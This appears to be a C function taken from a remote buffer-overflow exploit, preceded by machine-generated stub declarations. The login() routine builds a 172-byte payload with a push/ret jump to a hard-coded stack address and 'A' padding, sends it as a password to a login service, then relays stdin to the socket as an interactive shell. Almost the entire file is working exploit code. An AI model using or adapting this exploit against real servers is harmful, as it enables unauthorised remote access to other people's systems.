
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buf ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int exit (int) ;
 int fflush (int ) ;
 int fprintf (int ,char*,char*) ;
 int memset (char*,char,int) ;
 int printf (char*) ;
 int read (int,char*,int) ;
 int select (int,int *,int ,int ,int ) ;
 int sendstr (int,char*,int ) ;
 int sleep (int) ;
 int stderr ;
 int stdout ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void login(int sd)
{
 char buf[1024];
 char exploit_buf[172];
 char cx[3]="\r\n\0";
 int x;
   fd_set rset;

 memset(exploit_buf,'\0',172);



 x = 0;
 exploit_buf[x++]=0x68;


 exploit_buf[x++]=0x30;
 exploit_buf[x++]=0xfe;
 exploit_buf[x++]=0xff;
 exploit_buf[x++]=0xff;
 exploit_buf[x++]=0xff;
 exploit_buf[x++]=0xbf;
 exploit_buf[x++]=0xbf;

 exploit_buf[x++]=0xc3;

 memset(exploit_buf+x,'A',150);
 x+=150;
 exploit_buf[x++]=0xb5;
 exploit_buf[x++]=0xd4;

 sleep(2);

 memset(buf,'\0',sizeof(buf));
 strcpy(buf, "xie\r\n\0");

 printf("[*] sending username \n");
 sendstr(sd,buf,strlen(buf));

 sleep(1);
 printf("[*] sending password\n");
 sleep(2);

 memset(buf,'\0',sizeof(buf));
 strcpy(buf, exploit_buf);
 strcat(buf,"\r\n\0");
 sendstr(sd,buf,strlen(buf));

 sleep(2);
 fflush(stdout);
 FD_ZERO(&rset);
 while (1)
 {
  FD_SET(sd,&rset);
  FD_SET(0,&rset);
  select(sd+1,&rset,0,0,0);
  if (FD_ISSET(sd,&rset))
  {
   memset(buf,'\0',sizeof(buf));
   if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
   {
    printf("Connection closed by foreign host.\n");
    exit(-1);
   }
   fprintf(stderr,"%s",buf);
  }
  if (FD_ISSET(0,&rset))
  {
   memset(buf,'\0',sizeof(buf));
   if ((x = read(0,buf,sizeof(buf)-1)) > 0)
   {
    write(sd,buf,x);
   }
  }
 }
}
